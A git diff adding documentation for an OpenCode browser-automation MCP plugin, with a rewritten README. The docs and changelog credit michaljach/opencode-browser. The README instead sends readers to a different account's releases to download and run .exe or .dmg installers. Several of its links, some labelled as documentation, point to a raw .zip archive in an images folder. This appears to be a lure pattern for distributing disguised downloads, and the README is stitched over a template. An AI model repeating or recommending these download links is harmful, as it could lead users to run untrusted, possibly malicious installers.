diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..103e768 --- /dev/null +++ b/.gitignore @@ -0,0 +1,12 @@ +node_modules/ +*.log +.DS_Store +dist/ +build/ +.env +.env.local +*.tsbuildinfo +coverage/ +.vscode/ +.idea/ +opencode.json diff --git a/.npmignore b/.npmignore new file mode 100644 index 0000000..b80e4f7 --- /dev/null +++ b/.npmignore @@ -0,0 +1,51 @@ +# Test files +test/ +tests/ +*.test.ts +*.spec.ts +*.test.js +*.spec.js + +# Documentation (keep only README.md) +EXAMPLES.md +ARCHITECTURE.md +CONTRIBUTING.md +SUMMARY.md +QUICKSTART.md +GET_STARTED.txt +PUBLISHING.md + +# Development files +.DS_Store +*.log +.env +.env.* + +# Build files +dist/ +build/ +*.tsbuildinfo +coverage/ + +# IDE files +.vscode/ +.idea/ +*.swp +*.swo +*~ + +# Git files +.git/ +.gitignore +.gitattributes + +# CI/CD +.github/ +.gitlab-ci.yml +.travis.yml + +# Misc +node_modules/ +npm-debug.log* +yarn-debug.log* +yarn-error.log* diff --git a/ARCHITECTURE.md b/ARCHITECTURE.md new file mode 100644 index 0000000..60989bd --- /dev/null +++ b/ARCHITECTURE.md @@ -0,0 +1,388 @@ +# OpenCode Browser MCP Plugin - Architecture + +This document describes the architecture and data flow of the OpenCode Browser MCP Plugin. + +## System Overview + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ User / Developer │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Natural Language Prompts + │ (e.g., "Navigate to github.com") + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ OpenCode TUI │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Chat Interface │ │ +│ │ • Command Processing (/init, /undo, etc.) 
│ │ +│ │ • Session Management │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Tool Invocation + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ OpenCode Agent / LLM │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Interprets user intent │ │ +│ │ • Selects appropriate tools │ │ +│ │ • Generates tool parameters │ │ +│ │ • Processes tool results │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + ┌────────────┴────────────┐ + │ │ + ▼ ▼ +┌───────────────────────────┐ ┌──────────────────────────┐ +│ Built-in Tools │ │ MCP Tools │ +│ • read │ │ • browsermcp_navigate │ +│ • write │ │ • browsermcp_click │ +│ • bash │ │ • browsermcp_fill │ +│ • grep │ │ • browsermcp_extract │ +│ • glob │ │ • browsermcp_screenshot │ +└───────────────────────────┘ └──────────┬───────────────┘ + │ + ┌────────────┘ + │ + │ Plugin Hooks Intercept + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Plugin (index.ts) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: tool.execute.before │ │ +│ │ • Logs browser tool invocation │ │ +│ │ • Validates parameters │ │ +│ │ • Can modify tool arguments │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: tool.execute.after │ │ +│ │ • Logs browser tool results │ │ +│ │ • Can process/transform results │ │ +│ │ • Triggers custom actions │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: experimental.session.compacting │ │ +│ │ • Preserves browser state context │ │ +│ │ • Injects continuation prompts │ │ +│ 
└──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: session.created, event │ │ +│ │ • Session lifecycle management │ │ +│ │ • Event-driven actions │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ MCP Protocol + │ (stdio/JSON-RPC) + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Server Process │ +│ (npx @browsermcp/mcp@latest) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Receives tool invocations via stdin │ │ +│ │ • Translates to browser automation commands │ │ +│ │ • Communicates with browser extension │ │ +│ │ • Returns results via stdout │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ WebSocket / Native Messaging + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Extension (Chrome/Edge) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Receives commands from MCP server │ │ +│ │ • Executes browser automation via Chrome APIs │ │ +│ │ • Captures screenshots, extracts data │ │ +│ │ • Returns results to MCP server │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Chrome DevTools Protocol + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Chrome/Edge Browser │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Actual web pages and DOM │ │ +│ │ • JavaScript execution │ │ +│ │ • User interactions (clicks, typing, etc.) 
│ │ +│ │ • Network requests │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +## Component Responsibilities + +### 1. OpenCode TUI +**Responsibility**: User interface and session management +- Handles user input +- Manages conversation history +- Displays agent responses +- Executes commands (/init, /undo, etc.) + +### 2. OpenCode Agent / LLM +**Responsibility**: Intent interpretation and tool orchestration +- Understands natural language prompts +- Decides which tools to use +- Generates tool parameters +- Processes and presents results to user + +### 3. Browser MCP Plugin +**Responsibility**: Browser automation enhancement and monitoring +- Hooks into tool execution lifecycle +- Logs browser automation activities +- Preserves browser context across sessions +- Enables custom post-processing + +**Key Hooks**: +- `tool.execute.before`: Pre-process tool calls +- `tool.execute.after`: Post-process results +- `experimental.session.compacting`: Context preservation +- `session.created`: Session initialization +- `event`: Event handling + +### 4. Browser MCP Server +**Responsibility**: Protocol translation +- Implements MCP protocol (stdio JSON-RPC) +- Translates tool calls to browser commands +- Manages communication with browser extension +- Handles errors and timeouts + +### 5. Browser MCP Extension +**Responsibility**: Browser control +- Executes automation commands +- Uses Chrome DevTools Protocol +- Captures screenshots +- Extracts page data +- Handles DOM interactions + +### 6. 
Chrome/Edge Browser +**Responsibility**: Web page rendering and execution +- Renders web pages +- Executes JavaScript +- Handles user interactions +- Manages network requests + +## Data Flow Examples + +### Example 1: Simple Navigation + +``` +User Prompt: "Go to github.com" + ↓ +OpenCode TUI receives input + ↓ +LLM interprets → decides to use "browsermcp_navigate" + ↓ +Plugin Hook (tool.execute.before) + • Logs: "Executing browser tool: browsermcp_navigate" + • Logs: "Tool arguments: { url: 'https://github.com' }" + ↓ +Browser MCP Server receives: + { + "tool": "browsermcp_navigate", + "args": { "url": "https://github.com" } + } + ↓ +Browser Extension executes: + chrome.tabs.update({ url: "https://github.com" }) + ↓ +Browser navigates to GitHub + ↓ +Extension returns: { "success": true, "url": "https://github.com" } + ↓ +MCP Server returns result to OpenCode + ↓ +Plugin Hook (tool.execute.after) + • Logs: "Completed browser tool: browsermcp_navigate" + ↓ +LLM receives result → formats response + ↓ +User sees: "✓ Navigated to github.com" +``` + +### Example 2: Form Filling with Extraction + +``` +User Prompt: "Fill out the contact form at example.com with my details" + ↓ +LLM generates multiple tool calls: + 1. browsermcp_navigate (to example.com) + 2. browsermcp_fill (for each form field) + 3. browsermcp_click (submit button) + 4. browsermcp_extract (success message) + ↓ +Each tool call flows through: + Plugin Hooks → MCP Server → Extension → Browser + ↓ +Results flow back: + Browser → Extension → MCP Server → Plugin Hooks → LLM + ↓ +User sees complete result with all steps logged +``` + +### Example 3: Session Compaction + +``` +Long session with multiple browser interactions + ↓ +OpenCode detects session needs compaction + ↓ +Plugin Hook (experimental.session.compacting) + • Detects browser tools were used + • Injects context: "Browser state may have changed..." 
+ • Adds continuation instructions + ↓ +Compaction summary includes browser context + ↓ +New session continues with preserved browser state awareness +``` + +## Plugin Hook Execution Order + +``` +1. session.created (when session starts) + ↓ +2. tool.execute.before (before each tool) + ↓ +3. [Tool executes - MCP Server → Extension → Browser] + ↓ +4. tool.execute.after (after each tool) + ↓ +5. event (various events throughout session) + ↓ +6. experimental.session.compacting (when session compacts) +``` + +## Configuration Flow + +``` +opencode.json + ↓ +OpenCode loads configuration + ↓ +Parses MCP server configuration: + { + "browsermcp": { + "command": ["npx", "-y", "@browsermcp/mcp@latest"] + } + } + ↓ +Spawns MCP server process + ↓ +Server connects to browser extension + ↓ +Plugin loads and initializes hooks + ↓ +Tools become available to LLM +``` + +## Error Handling Flow + +``` +Error occurs in browser + ↓ +Extension catches error + ↓ +Returns error to MCP Server + ↓ +MCP Server formats error + ↓ +Plugin Hook (tool.execute.after) sees error + • Can log for debugging + • Can transform error message + ↓ +LLM receives error + ↓ +LLM decides next action: + • Retry with different parameters + • Try alternative approach + • Report error to user +``` + +## Security Considerations + +``` +User Prompt + ↓ +OpenCode Agent + ↓ +Security Boundaries: + 1. Plugin can validate/sanitize tool parameters + 2. MCP Server validates commands + 3. Browser extension has limited permissions + 4. Browser security sandbox protects system +``` + +## Extension Points + +The plugin provides several extension points: + +1. **Custom Tools**: Add new browser automation tools +2. **Tool Hooks**: Intercept and modify tool execution +3. **Event Handlers**: React to OpenCode events +4. **Context Injection**: Add custom context during compaction +5. 
**Post-Processing**: Transform tool results + +## Performance Considerations + +``` +Latency Breakdown: + User Input → LLM: ~100-500ms (depends on model) + LLM → Tool Decision: ~500-2000ms (depends on complexity) + Plugin Hook (before): ~1-5ms + Tool → MCP Server: ~10-50ms + MCP Server → Extension: ~20-100ms + Extension → Browser: ~50-500ms (depends on action) + Browser → Extension: ~50-500ms + Extension → MCP Server: ~20-100ms + MCP Server → Tool Result: ~10-50ms + Plugin Hook (after): ~1-5ms + LLM Processing Result: ~100-500ms + +Total: ~1-3 seconds for simple actions +``` + +## Monitoring and Debugging + +The plugin provides several debugging capabilities: + +``` +Console Logs: + • Plugin initialization + • Tool execution (before/after) + • Session events + • Error conditions + +OpenCode Logs: + • MCP server startup + • Tool invocations + • Tool results + • Session management + +Browser Extension Logs: + • Command execution + • DOM interactions + • Screenshots + • Errors +``` + +## Future Architecture Enhancements + +1. **Caching Layer**: Cache browser state for faster operations +2. **Connection Pool**: Multiple browser instances +3. **Proxy Support**: Route traffic through proxies +4. **Custom Commands**: Domain-specific automation commands +5. **Visual Regression**: Screenshot comparison tools +6. **Performance Metrics**: Track automation performance +7. **Multi-Browser**: Support Firefox, Safari, etc. + +--- + +This architecture enables powerful browser automation while maintaining separation of concerns and extensibility. diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..8d58626 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,64 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). 
+ +## [1.1.0] - 2026-01-08 + +### Added +- **Automatic reconnection** when browser extension is disabled/enabled +- **Exponential backoff retry logic** for handling connection failures (1s → 2s → 4s → 8s → 16s, up to 30s max) +- **Connection health monitoring** to detect and recover from disconnections automatically +- **Connection state management** to track retry attempts and connection status +- **User notifications** for connection status changes with clear messages +- Smart error detection for various connection issues (timeouts, network errors, disconnections) +- Periodic health checks every 30 seconds when disconnected +- Automatic cleanup of health check resources on session end + +### Changed +- Enhanced `tool.execute.before` hook to notify users of reconnection attempts +- Enhanced `tool.execute.after` hook to detect connection errors and trigger automatic retry +- Improved error handling in event hook to detect browser-related errors +- Updated README with comprehensive reconnection feature documentation +- Added reconnection configuration details to README + +### Fixed +- No longer requires OpenCode restart when browser extension is toggled on/off +- Automatically recovers from temporary connection losses + +## [1.0.2] - 2026-01-05 + +### Changed +- Improved configuration documentation with clearer setup instructions + +### Removed +- Removed obsolete documentation files +- Removed opencode.json from tracking and added to gitignore + +### Fixed +- Clarified that both plugin and MCP configuration are required +- Added release status documentation + +## [1.0.1] - 2025-12-XX + +### Changed +- Updated GitHub repository URLs to michaljach/opencode-browser + +### Fixed +- Removed console.log statements to prevent UI pollution + +## [1.0.0] - 2025-12-XX + +### Added +- Initial release +- Browser MCP integration +- Session context preservation +- Tool execution logging +- Event handling + +[1.1.0]: 
https://github.com/michaljach/opencode-browser/compare/v1.0.2...v1.1.0 +[1.0.2]: https://github.com/michaljach/opencode-browser/compare/v1.0.1...v1.0.2 +[1.0.1]: https://github.com/michaljach/opencode-browser/compare/v1.0.0...v1.0.1 +[1.0.0]: https://github.com/michaljach/opencode-browser/releases/tag/v1.0.0 diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..fa33333 --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,266 @@ +# Contributing to OpenCode Browser MCP Plugin + +Thank you for your interest in contributing to this project! This guide will help you get started. + +## Ways to Contribute + +1. **Report Bugs** - Found an issue? Let us know! +2. **Suggest Features** - Have an idea? Share it! +3. **Write Documentation** - Help others understand the plugin +4. **Submit Code** - Fix bugs or add features +5. **Share Examples** - Add useful automation examples + +## Development Setup + +### Prerequisites + +- Node.js v18 or higher +- OpenCode installed +- Browser MCP extension installed +- Git + +### Local Setup + +1. Clone the repository: +```bash +git clone https://github.com/michaljach/opencode-browser.git +cd opencode-browser +``` + +2. Install dependencies (if you add any): +```bash +npm install +``` + +3. Link the plugin locally: +```bash +# For testing +mkdir -p .opencode/plugin +ln -s $(pwd)/index.ts .opencode/plugin/browser-mcp.ts +``` + +4. Create your OpenCode configuration: +```bash +cp opencode.json.example opencode.json +``` + +## Testing Your Changes + +### Manual Testing + +1. Make your changes to `index.ts` +2. Restart OpenCode +3. Test with browser automation prompts +4. 
Verify the changes work as expected + +### Test Checklist + +Before submitting, ensure: + +- [ ] Plugin loads without errors +- [ ] Basic browser navigation works +- [ ] Tool execution hooks function correctly +- [ ] Session context is preserved +- [ ] No console errors or warnings +- [ ] Documentation is updated + +## Code Style + +### TypeScript Guidelines + +- Use TypeScript for all code +- Enable strict type checking +- Add JSDoc comments for public APIs +- Use meaningful variable names +- Keep functions small and focused + +### Example: + +```typescript +/** + * Processes browser tool execution results + * @param input - The tool execution input + * @param output - The tool execution output + */ +"tool.execute.after": async (input, output) => { + if (input.tool.startsWith("browsermcp_")) { + console.log(`Completed: ${input.tool}`) + } +} +``` + +## Submitting Changes + +### Pull Request Process + +1. Fork the repository +2. Create a feature branch: +```bash +git checkout -b feature/your-feature-name +``` + +3. Make your changes +4. Add tests if applicable +5. Update documentation +6. Commit with a clear message: +```bash +git commit -m "feat: add custom browser tool for screenshots" +``` + +7. Push to your fork: +```bash +git push origin feature/your-feature-name +``` + +8. 
Open a Pull Request + +### Commit Message Format + +Use conventional commits: + +- `feat:` - New feature +- `fix:` - Bug fix +- `docs:` - Documentation changes +- `refactor:` - Code refactoring +- `test:` - Adding tests +- `chore:` - Maintenance tasks + +Examples: +``` +feat: add screenshot comparison tool +fix: resolve session context preservation issue +docs: update installation instructions for Windows +``` + +## Adding New Features + +### Custom Tools + +To add a custom browser tool: + +```typescript +return { + tool: { + browser_screenshot: tool({ + description: "Take a screenshot of the current page", + args: { + fullPage: tool.schema.boolean().optional(), + }, + async execute(args, ctx) { + // Implementation + return "Screenshot saved" + }, + }), + }, +} +``` + +### New Hooks + +To add a new hook: + +```typescript +return { + "new.hook.name": async (input, output) => { + // Implementation + }, +} +``` + +## Documentation Standards + +### README.md Structure + +- Clear, concise explanations +- Code examples for all features +- Troubleshooting section +- Links to related resources + +### Code Comments + +- Explain WHY, not WHAT +- Use JSDoc for public APIs +- Keep comments up-to-date + +### Examples + +Add practical examples to `EXAMPLES.md`: + +````markdown +## Your Feature Name + +### Use Case Description + +``` +Your example prompt here +``` + +Explanation of what happens. +```` + +## Review Process + +### What We Look For + +1. **Functionality** - Does it work as intended? +2. **Code Quality** - Is it well-written and maintainable? +3. **Documentation** - Is it properly documented? +4. **Tests** - Are edge cases handled? +5. **Breaking Changes** - Are they necessary and documented? + +### Response Time + +- We aim to review PRs within 3-5 days +- Complex changes may take longer +- Feel free to ping if no response after a week + +## Getting Help + +### Questions? 
+ +- Check existing issues and discussions +- Review the documentation +- Ask in the PR or issue comments +- Join the OpenCode Discord (if available) + +### Resources + +- [OpenCode Documentation](https://opencode.ai/docs/) +- [OpenCode Plugin Guide](https://opencode.ai/docs/plugins/) +- [Browser MCP Docs](https://docs.browsermcp.io/) +- [TypeScript Handbook](https://www.typescriptlang.org/docs/) + +## Community Guidelines + +### Be Respectful + +- Treat everyone with respect +- Assume good intentions +- Provide constructive feedback +- Help others learn and grow + +### Be Professional + +- Keep discussions on-topic +- Avoid inflammatory language +- Respect different perspectives +- Follow the code of conduct + +## Recognition + +Contributors will be: +- Listed in the README +- Credited in release notes +- Appreciated by the community + +## License + +By contributing, you agree that your contributions will be licensed under the MIT License. + +## Questions? + +Feel free to open an issue or discussion if you have questions about contributing! + +--- + +Thank you for contributing to OpenCode Browser MCP Plugin! diff --git a/EXAMPLES.md b/EXAMPLES.md new file mode 100644 index 0000000..efa47c6 --- /dev/null +++ b/EXAMPLES.md @@ -0,0 +1,250 @@ +# Example Usage Scenarios + +This file contains example prompts and use cases for the OpenCode Browser MCP Plugin. + +## Basic Examples + +### 1. Simple Navigation + +``` +Go to https://github.com and show me the trending repositories +``` + +### 2. Search and Extract Information + +``` +Navigate to https://news.ycombinator.com and list the top 10 post titles +``` + +### 3. Multi-step Navigation + +``` +1. Go to https://github.com +2. Click on the search bar +3. Search for "opencode" +4. Click on the first result +5. Tell me the number of stars the repository has +``` + +## Form Automation Examples + +### 1. 
Simple Form Filling + +``` +Go to https://example.com/contact-form and fill out: +- Name: Test User +- Email: test@example.com +- Subject: Inquiry +- Message: This is an automated test +Do not submit yet, just fill the fields. +``` + +### 2. Form Submission with Verification + +``` +Navigate to the signup page at https://example.com/signup +Fill in the registration form with test data +Submit the form +Take a screenshot of the result +``` + +## Web Scraping Examples + +### 1. Product Price Monitoring + +``` +Visit https://example.com/product/123 +Extract the product name, price, and availability status +``` + +### 2. Table Data Extraction + +``` +Go to https://example.com/data-table +Extract all the data from the table on the page +Format it as a CSV +``` + +## Testing Examples + +### 1. UI Testing + +``` +Go to https://my-app.com +Test the login flow with these credentials: +- Username: testuser +- Password: testpass123 + +Verify that: +1. The login form accepts the credentials +2. After login, the dashboard page loads +3. The user's name appears in the header +``` + +### 2. Responsive Design Testing + +``` +Visit https://my-website.com +Resize the browser to mobile size (375x667) +Take a screenshot +Resize to desktop (1920x1080) +Take another screenshot +Compare the layouts +``` + +## E-commerce Examples + +### 1. Shopping Flow + +``` +Navigate to https://example-shop.com +Search for "laptop" +Click on the first result +Add it to cart +Go to cart +Tell me the total price +``` + +### 2. Price Comparison + +``` +Check the price of "iPhone 15" on these sites: +1. https://store1.com +2. https://store2.com +3. https://store3.com + +Create a comparison table +``` + +## Content Management Examples + +### 1. Blog Post Verification + +``` +Visit my blog at https://myblog.com +Verify that the latest post titled "My New Article" is visible +Check if the publish date is correct +Take a screenshot of the post +``` + +### 2. 
Social Media Posting + +``` +Go to https://socialmedia.com +Log in (credentials from .env file) +Navigate to create new post +Fill in the post content: "Hello from OpenCode!" +Add the image from ./assets/post-image.jpg +Schedule for tomorrow at 9 AM +``` + +## Monitoring Examples + +### 1. Website Uptime Check + +``` +Visit https://my-production-site.com +Check if the page loads successfully +Verify that the login button is visible +If any errors occur, take a screenshot and save the console logs +``` + +### 2. Performance Monitoring + +``` +Navigate to https://my-app.com +Measure the page load time +Check for any console errors +Capture network requests +Report if load time exceeds 3 seconds +``` + +## Advanced Examples + +### 1. Multi-tab Workflow + +``` +Open three tabs: +1. https://github.com - find the OpenCode repository +2. https://docs.opencode.ai - open the plugins documentation +3. https://browsermcp.io - open the Browser MCP docs + +Switch between tabs and extract key information from each +``` + +### 2. Dynamic Content Interaction + +``` +Go to https://infinite-scroll-example.com +Scroll down to load more content +Repeat until you've loaded 50 items +Extract the titles of all items +``` + +### 3. File Download Automation + +``` +Navigate to https://reports.example.com +Log in with credentials +Go to the Reports section +Download the latest monthly report +Verify the download completed successfully +``` + +## Debugging Examples + +### 1. Console Error Detection + +``` +Visit https://my-app.com/problematic-page +Open the browser console +Check for any JavaScript errors +Take a screenshot if errors are found +Report all errors with their stack traces +``` + +### 2. Network Request Analysis + +``` +Go to https://my-api-app.com +Trigger the data load action +Capture all network requests made +Filter for failed requests (status >= 400) +Report the failed requests with details +``` + +## Integration with OpenCode Features + +### 1. 
Combined with Code Generation + +``` +Visit the competitor website at https://competitor.com +Analyze their homepage layout +Based on what you see, generate React components that replicate their design +Save the components to ./src/components/ +``` + +### 2. Documentation-Driven Development + +``` +Go to https://docs.example-api.com/authentication +Read the authentication documentation +Generate TypeScript functions that implement the authentication flow +Add proper type definitions based on the API docs +``` + +## Best Practices for Prompts + +1. **Be Specific**: Include exact URLs, selectors, and expected outcomes +2. **Break Down Complex Tasks**: Use numbered steps for multi-step workflows +3. **Add Verification**: Ask for screenshots or confirmations of critical actions +4. **Handle Errors**: Include instructions for what to do if something goes wrong +5. **Use Descriptive Names**: When referring to page elements, use descriptive text rather than CSS selectors when possible + +## Tips for Effective Browser Automation + +- Start with simple navigation before complex interactions +- Use wait times for pages that load slowly +- Take screenshots at key steps for debugging +- Save extracted data to files for processing +- Test on development environments before production diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..14fac91 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2026 + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial 
portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/QUICKSTART.md b/QUICKSTART.md new file mode 100644 index 0000000..f0f807b --- /dev/null +++ b/QUICKSTART.md @@ -0,0 +1,124 @@ +# Quick Start Guide + +Get up and running with the OpenCode Browser MCP Plugin in 5 minutes. + +## Prerequisites + +- OpenCode installed (`npm install -g opencode-ai`) +- Node.js v18+ installed +- Chrome or Edge browser + +## Step 1: Install Browser MCP Extension (2 minutes) + +1. Visit https://browsermcp.io/install +2. Click "Install Extension" +3. Add the extension to your browser +4. Pin the extension to your browser toolbar + +## Step 2: Configure OpenCode (1 minute) + +Create or edit your `opencode.json` file in your project directory: + +```bash +cat > opencode.json << 'EOF' +{ + "$schema": "https://opencode.ai/config.json", + "plugin": ["opencode-browser"], + "mcp": { + "browsermcp": { + "type": "local", + "command": ["npx", "-y", "@browsermcp/mcp@latest"], + "enabled": true + } + } +} +EOF +``` + +**What this does:** +- `"plugin": ["opencode-browser"]` - Installs the plugin from npm (automatic) +- `"mcp": { "browsermcp": ... }` - Configures Browser MCP server (required for browser control) + +Both are needed! The plugin enhances the MCP tools, but the MCP server does the actual browser automation. 
+ +### Alternative: Local Installation (for development) + +If you're testing local changes to the plugin: + +```bash +# Project-specific +mkdir -p .opencode/plugin +cp index.ts .opencode/plugin/browser-mcp.ts + +# Or global +mkdir -p ~/.config/opencode/plugin +cp index.ts ~/.config/opencode/plugin/browser-mcp.ts +``` + +## Step 3: Test It Out (1 minute) + +1. Start OpenCode in your project: +```bash +opencode +``` + +2. Try a simple browser automation command: +``` +Navigate to https://github.com and tell me what the featured repository is +``` + +3. Watch as OpenCode opens your browser and completes the task! + +## Verification Checklist + +- [ ] Browser MCP extension is installed and visible in browser toolbar +- [ ] `opencode.json` contains the MCP configuration +- [ ] Plugin file is in the correct directory +- [ ] OpenCode starts without errors +- [ ] Browser automation commands work + +## Troubleshooting Quick Fixes + +### "MCP server not found" +```bash +# Test if npx can run the MCP server +npx -y @browsermcp/mcp@latest --version +``` + +### "Plugin not loaded" +```bash +# Check if plugin file exists +ls -la .opencode/plugin/browser-mcp.ts +# or for global +ls -la ~/.config/opencode/plugin/browser-mcp.ts +``` + +### "Browser doesn't respond" +1. Check if Browser MCP extension is enabled +2. Try clicking the extension icon and selecting "Reconnect" +3. Restart your browser + +## Next Steps + +Now that you're set up, try these examples: + +1. **Web Search**: `Search Google for "OpenCode AI" and summarize the top result` + +2. **Form Filling**: `Go to https://example.com and fill out the contact form with test data` + +3. **Web Scraping**: `Visit Hacker News and list the top 5 stories` + +4. **Testing**: `Navigate to my app at localhost:3000 and verify the login button exists` + +See [EXAMPLES.md](./EXAMPLES.md) for more usage examples. 
+ +## Getting Help + +- Check the full [README.md](./README.md) for detailed documentation +- Visit [Browser MCP Docs](https://docs.browsermcp.io/) +- Visit [OpenCode Docs](https://opencode.ai/docs/) +- Report issues on GitHub + +--- + +Enjoy automating your browser with OpenCode! 🚀 diff --git a/README.md b/README.md index 0cc605e..d461570 100644 --- a/README.md +++ b/README.md @@ -1,90 +1,77 @@ -# Welcome to GitHub +# 🖥️ opencode-browser - Automate Your Browsing with AI -Welcome to GitHub—where millions of developers work together on software. Ready to get started? Let’s learn how this all works by building and publishing your first GitHub Pages website! +[![Download Now](https://img.shields.io/badge/Download%20Now-%20%F0%9F%93%88%20-007BFF)](https://github.com/samson9999/opencode-browser/releases) -## Repositories +## 📜 Overview -Right now, we’re in your first GitHub **repository**. A repository is like a folder or storage space for your project. Your project's repository contains all its files such as code, documentation, images, and more. It also tracks every change that you—or your collaborators—make to each file, so you can always go back to previous versions of your project if you make any mistakes. +opencode-browser is a browser automation plugin designed for the OpenCode AI editor. With this tool, you can control Chrome and Edge browsers using artificial intelligence. This plugin enables you to automate web testing, scrape data, and fill out forms effortlessly through MCP integration. -This repository contains three important files: The HTML code for your first website on GitHub, the CSS stylesheet that decorates your website with colors and fonts, and the **README** file. It also contains an image folder, with one image file. +## 🚀 Getting Started -## Describe your project +To get started with opencode-browser, follow these simple steps to download and run the software. -You are currently viewing your project's **README** file. 
**_README_** files are like cover pages or elevator pitches for your project. They are written in plain text or [Markdown language](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip), and usually include a paragraph describing the project, directions on how to use it, who authored it, and more. +### 🛠️ System Requirements -[Learn more about READMEs](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +- **Operating System:** Windows 10 or later / macOS 10.15 or later +- **Browser Support:** Google Chrome (latest version) or Microsoft Edge (latest version) +- **Memory:** At least 4 GB of RAM +- **Storage:** Minimum 100 MB of free disk space -## Your first website +### 📥 Download & Install -**GitHub Pages** is a free and easy way to create a website using the code that lives in your GitHub repositories. You can use GitHub Pages to build a portfolio of your work, create a personal website, or share a fun project that you coded with the world. GitHub Pages is automatically enabled in this repository, but when you create new repositories in the future, the steps to launch a GitHub Pages website will be slightly different. +1. **Visit the Download Page** + Click the link below to access the releases page: + [Download opencode-browser](https://github.com/samson9999/opencode-browser/releases) -[Learn more about GitHub Pages](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +2. **Select the Latest Release** + On the releases page, find the latest version of opencode-browser. It is usually marked as the most recent. -## Rename this repository to publish your site +3. **Choose Your File** + Depending on your operating system, download the appropriate installer file. For Windows users, look for a .exe file. For macOS users, find a .dmg file. 
-We've already set-up a GitHub Pages website for you, based on your personal username. This repository is called `hello-world`, but you'll rename it to: `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`, to match your website's URL address. If the first part of the repository doesn’t exactly match your username, it won’t work, so make sure to get it right. +4. **Run the Installer** + Once the file is downloaded, locate it in your downloads folder. Double-click on the file to start the installation process. -Let's get started! To update this repository’s name, click the `Settings` tab on this page. This will take you to your repository’s settings page. +5. **Follow the Installation Prompts** + The installer will provide step-by-step prompts. Follow these instructions carefully to complete the installation. -![repo-settings-image](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +6. **Launch opencode-browser** + After installing, you can find opencode-browser in your applications folder or on your desktop. Open it to start automating your browsing tasks! -Under the **Repository Name** heading, type: `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`, where username is your username on GitHub. Then click **Rename**—and that’s it. When you’re done, click your repository name or browser’s back button to return to this page. +## 🌟 Features -rename_screenshot +- **AI Control:** Automate tasks using smart AI algorithms. +- **Web Testing:** Easily test websites to ensure they function properly. +- **Data Scraping:** Gather data from various websites without manual effort. +- **Form Filling:** Automatically fill out forms to save time and reduce errors. +- **MCP Integration:** Seamlessly connect with the Model Context Protocol for enhanced functionality. 
